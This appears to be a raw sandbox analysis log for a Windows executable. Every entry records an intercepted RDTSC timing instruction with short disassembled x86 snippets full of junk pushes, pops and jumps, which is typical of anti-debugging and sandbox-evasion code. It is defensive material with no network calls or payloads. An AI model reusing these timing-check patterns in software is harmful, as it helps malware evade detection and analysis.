Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 9D77EC second address: 9D77F6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jbe 00007F5F64D1DAB6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 9D7AFE second address: 9D7B06 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 push eax 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 9D7B06 second address: 9D7B4B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 popad 0x00000006 mov dword ptr [esp], eax 0x00000009 jmp 00007F5F64D1DAC5h 0x0000000e push dword ptr [ebp+122D1961h] 0x00000014 jmp 00007F5F64D1DAC8h 0x00000019 push 50C08115h 0x0000001e push ebx 0x0000001f pushad 0x00000020 push eax 0x00000021 push edx 0x00000022 rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 9D7B4B second address: 9D7B51 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 9D9412 second address: 9D9418 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 9D9418 second address: 9D941C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 9D941C second address: 9D9436 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007F5F64D1DAC2h 0x0000000d rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 9D8F9A second address: 9D8F9F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 503001D second address: 5030022 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 5030022 second address: 5030031 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F5F64D1DF1Bh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 5030031 second address: 503008F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5F64D1DAC9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c jmp 00007F5F64D1DAC1h 0x00000011 xchg eax, ebp 0x00000012 pushad 0x00000013 jmp 00007F5F64D1DABCh 0x00000018 mov edx, eax 0x0000001a popad 0x0000001b mov ebp, esp 0x0000001d push eax 0x0000001e push edx 0x0000001f push eax 0x00000020 push edx 0x00000021 jmp 00007F5F64D1DAC6h 0x00000026 rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 503008F second address: 5030093 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 5030093 second address: 5030099 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 5030099 second address: 50300D9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5F64D1DF1Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop ebp 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d pushfd 0x0000000e jmp 00007F5F64D1DF1Dh 0x00000013 sbb ecx, 29E53286h 0x00000019 jmp 00007F5F64D1DF21h 0x0000001e popfd 0x0000001f mov dx, cx 0x00000022 popad 0x00000023 rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 50300D9 second address: 50300F5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F5F64D1DAC8h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 50300F5 second address: 50300F9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 5010F70 second address: 5010F9D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5F64D1DAC9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F5F64D1DABDh 0x00000011 rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 5010F9D second address: 5010FA3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 5010FA3 second address: 5010FA7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 5060136 second address: 5060169 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5F64D1DF21h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp], ebp 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f mov cl, bh 0x00000011 call 00007F5F64D1DF24h 0x00000016 pop ecx 0x00000017 popad 0x00000018 rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 5060169 second address: 506016F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 506016F second address: 5060173 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 4FF01A3 second address: 4FF01B5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F5F64D1DABEh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 4FF01B5 second address: 4FF01F0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esp], ebp 0x0000000b jmp 00007F5F64D1DF27h 0x00000010 mov ebp, esp 0x00000012 push eax 0x00000013 push edx 0x00000014 jmp 00007F5F64D1DF25h 0x00000019 rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 4FF01F0 second address: 4FF0200 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F5F64D1DABCh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 4FF0200 second address: 4FF0217 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push dword ptr [ebp+04h] 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F5F64D1DF1Ah 0x00000012 rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 5010C6D second address: 5010CB7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov si, di 0x00000006 pushfd 0x00000007 jmp 00007F5F64D1DAC3h 0x0000000c sub si, 6C3Eh 0x00000011 jmp 00007F5F64D1DAC9h 0x00000016 popfd 0x00000017 popad 0x00000018 pop edx 0x00000019 pop eax 0x0000001a xchg eax, ebp 0x0000001b pushad 0x0000001c push eax 0x0000001d push edx 0x0000001e jmp 00007F5F64D1DABAh 0x00000023 rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 5010CB7 second address: 5010D1C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5F64D1DF22h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushfd 0x0000000a jmp 00007F5F64D1DF22h 0x0000000f or al, FFFFFF98h 0x00000012 jmp 00007F5F64D1DF1Bh 0x00000017 popfd 0x00000018 popad 0x00000019 mov ebp, esp 0x0000001b pushad 0x0000001c call 00007F5F64D1DF24h 0x00000021 mov cx, AAD1h 0x00000025 pop esi 0x00000026 push eax 0x00000027 push edx 0x00000028 call 00007F5F64D1DF1Dh 0x0000002d pop eax 0x0000002e rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 5010D1C second address: 5010D2A instructions: 0x00000000 rdtsc 0x00000002 mov dh, 83h 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 pop ebp 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 5010D2A second address: 5010D2E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 5010D2E second address: 5010D32 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 5010D32 second address: 5010D38 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 5010D38 second address: 5010D3E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 5010D3E second address: 5010D42 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 5010D42 second address: 5010D46 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 50107C0 second address: 50107C6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 50107C6 second address: 50107FA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5F64D1DAC4h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, ebp 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F5F64D1DAC7h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 50107FA second address: 50107FF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 50107FF second address: 501084D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushfd 0x00000005 jmp 00007F5F64D1DAC5h 0x0000000a adc esi, 46A16D36h 0x00000010 jmp 00007F5F64D1DAC1h 0x00000015 popfd 0x00000016 popad 0x00000017 pop edx 0x00000018 pop eax 0x00000019 push eax 0x0000001a pushad 0x0000001b mov ecx, edi 0x0000001d call 00007F5F64D1DAC3h 0x00000022 push eax 0x00000023 push edx 0x00000024 rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 501084D second address: 501087E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 popad 0x00000006 xchg eax, ebp 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a pushfd 0x0000000b jmp 00007F5F64D1DF1Eh 0x00000010 jmp 00007F5F64D1DF25h 0x00000015 popfd 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 501087E second address: 5010883 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 50106A2 second address: 50106E3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F5F64D1DF21h 0x00000009 sub cl, FFFFFFD6h 0x0000000c jmp 00007F5F64D1DF21h 0x00000011 popfd 0x00000012 mov bh, ch 0x00000014 popad 0x00000015 pop edx 0x00000016 pop eax 0x00000017 push eax 0x00000018 push eax 0x00000019 push edx 0x0000001a jmp 00007F5F64D1DF1Fh 0x0000001f rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 50106E3 second address: 501070A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 movsx ebx, ax 0x00000006 mov ax, 5A27h 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d mov dword ptr [esp], ebp 0x00000010 jmp 00007F5F64D1DABAh 0x00000015 mov ebp, esp 0x00000017 push eax 0x00000018 push edx 0x00000019 pushad 0x0000001a mov ebx, 79118370h 0x0000001f push ebx 0x00000020 pop eax 0x00000021 popad 0x00000022 rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 501070A second address: 5010747 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F5F64D1DF20h 0x00000009 or cl, FFFFFFB8h 0x0000000c jmp 00007F5F64D1DF1Bh 0x00000011 popfd 0x00000012 mov di, ax 0x00000015 popad 0x00000016 pop edx 0x00000017 pop eax 0x00000018 pop ebp 0x00000019 push eax 0x0000001a push edx 0x0000001b jmp 00007F5F64D1DF21h 0x00000020 rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 5010747 second address: 5010784 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F5F64D1DAC7h 0x00000009 add esi, 4D377ADEh 0x0000000f jmp 00007F5F64D1DAC9h 0x00000014 popfd 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 50102E5 second address: 5010302 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5F64D1DF29h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 5010302 second address: 5010327 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5F64D1DAC1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F5F64D1DABDh 0x00000011 rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 5010327 second address: 5010379 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5F64D1DF21h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a pushad 0x0000000b push edi 0x0000000c movzx ecx, bx 0x0000000f pop edi 0x00000010 push ecx 0x00000011 pushfd 0x00000012 jmp 00007F5F64D1DF1Bh 0x00000017 sub al, FFFFFFBEh 0x0000001a jmp 00007F5F64D1DF29h 0x0000001f popfd 0x00000020 pop eax 0x00000021 popad 0x00000022 xchg eax, ebp 0x00000023 push eax 0x00000024 push edx 0x00000025 pushad 0x00000026 push esi 0x00000027 pop edx 0x00000028 mov bx, si 0x0000002b popad 0x0000002c rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 50202E3 second address: 50202E8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 50202E8 second address: 5020366 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5F64D1DF1Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a pushad 0x0000000b movzx ecx, di 0x0000000e jmp 00007F5F64D1DF21h 0x00000013 popad 0x00000014 push eax 0x00000015 jmp 00007F5F64D1DF21h 0x0000001a xchg eax, ebp 0x0000001b pushad 0x0000001c jmp 00007F5F64D1DF1Ch 0x00000021 jmp 00007F5F64D1DF22h 0x00000026 popad 0x00000027 mov ebp, esp 0x00000029 jmp 00007F5F64D1DF20h 0x0000002e pop ebp 0x0000002f push eax 0x00000030 push edx 0x00000031 push eax 0x00000032 push edx 0x00000033 jmp 00007F5F64D1DF1Ah 0x00000038 rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 5020366 second address: 502036C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 502036C second address: 5020371 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 5060030 second address: 50600D3 instructions: 0x00000000 rdtsc 0x00000002 pushfd 0x00000003 jmp 00007F5F64D1DAC3h 0x00000008 jmp 00007F5F64D1DAC3h 0x0000000d popfd 0x0000000e pop edx 0x0000000f pop eax 0x00000010 popad 0x00000011 xchg eax, ebp 0x00000012 pushad 0x00000013 mov ecx, 1B004D2Bh 0x00000018 jmp 00007F5F64D1DAC0h 0x0000001d popad 0x0000001e push eax 0x0000001f pushad 0x00000020 mov cx, bx 0x00000023 call 00007F5F64D1DABDh 0x00000028 mov si, 1EE7h 0x0000002c pop ecx 0x0000002d popad 0x0000002e xchg eax, ebp 0x0000002f jmp 00007F5F64D1DAC3h 0x00000034 mov ebp, esp 0x00000036 jmp 00007F5F64D1DAC6h 0x0000003b pop ebp 0x0000003c push eax 0x0000003d push edx 0x0000003e jmp 00007F5F64D1DAC7h 0x00000043 rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 50600D3 second address: 50600EB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F5F64D1DF24h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 50303AC second address: 50303B0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 50303B0 second address: 50303B6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 50303B6 second address: 50303D1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F5F64D1DAC7h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 50303D1 second address: 503040F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5F64D1DF29h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov dword ptr [esp], ebp 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007F5F64D1DF28h 0x00000017 rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 503040F second address: 503041E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5F64D1DABBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 503041E second address: 503046C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov ebx, 3E787AAAh 0x00000008 mov esi, ebx 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d mov ebp, esp 0x0000000f jmp 00007F5F64D1DF1Dh 0x00000014 mov eax, dword ptr [ebp+08h] 0x00000017 jmp 00007F5F64D1DF1Eh 0x0000001c and dword ptr [eax], 00000000h 0x0000001f jmp 00007F5F64D1DF20h 0x00000024 and dword ptr [eax+04h], 00000000h 0x00000028 push eax 0x00000029 push edx 0x0000002a pushad 0x0000002b pushad 0x0000002c popad 0x0000002d mov dx, 4D5Eh 0x00000031 popad 0x00000032 rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 501051E second address: 5010541 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5F64D1DAC0h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F5F64D1DABAh 0x00000013 rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 5010541 second address: 5010545 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 5010545 second address: 501054B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 501054B second address: 5010579 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 pushfd 0x00000006 jmp 00007F5F64D1DF1Ah 0x0000000b sbb si, 7668h 0x00000010 jmp 00007F5F64D1DF1Bh 0x00000015 popfd 0x00000016 popad 0x00000017 pop edx 0x00000018 pop eax 0x00000019 push eax 0x0000001a push eax 0x0000001b push edx 0x0000001c pushad 0x0000001d mov bx, cx 0x00000020 mov edx, esi 0x00000022 popad 0x00000023 rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 5010579 second address: 5010593 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F5F64D1DAC6h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 5010593 second address: 50105F3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xchg eax, ebp 0x00000009 jmp 00007F5F64D1DF27h 0x0000000e mov ebp, esp 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 pushfd 0x00000014 jmp 00007F5F64D1DF1Bh 0x00000019 adc ch, 0000006Eh 0x0000001c jmp 00007F5F64D1DF29h 0x00000021 popfd 0x00000022 call 00007F5F64D1DF20h 0x00000027 pop eax 0x00000028 popad 0x00000029 rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 50105F3 second address: 5010646 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F5F64D1DABEh 0x00000009 sbb cx, 1318h 0x0000000e jmp 00007F5F64D1DABBh 0x00000013 popfd 0x00000014 pushfd 0x00000015 jmp 00007F5F64D1DAC8h 0x0000001a sub ch, 00000078h 0x0000001d jmp 00007F5F64D1DABBh 0x00000022 popfd 0x00000023 popad 0x00000024 pop edx 0x00000025 pop eax 0x00000026 pop ebp 0x00000027 pushad 0x00000028 push eax 0x00000029 push eax 0x0000002a push edx 0x0000002b rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 5020EF0 second address: 5020EF4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 5020EF4 second address: 5020EF8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 5020EF8 second address: 5020EFE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 5020EFE second address: 5020F1B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F5F64D1DAC9h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 5020F1B second address: 5020F3F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push esp 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007F5F64D1DF29h 0x00000010 rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 5020F3F second address: 5020F45 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 5020F45 second address: 5020F49 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 5020F49 second address: 5020F8C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esp], ebp 0x0000000b jmp 00007F5F64D1DABFh 0x00000010 mov ebp, esp 0x00000012 pushad 0x00000013 push eax 0x00000014 push edx 0x00000015 pushfd 0x00000016 jmp 00007F5F64D1DAC2h 0x0000001b and cx, 5D58h 0x00000020 jmp 00007F5F64D1DABBh 0x00000025 popfd 0x00000026 rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 50301DD second address: 5030201 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5F64D1DF29h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d movzx ecx, dx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 5050758 second address: 5050773 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5F64D1DAC7h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 5050773 second address: 5050779 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
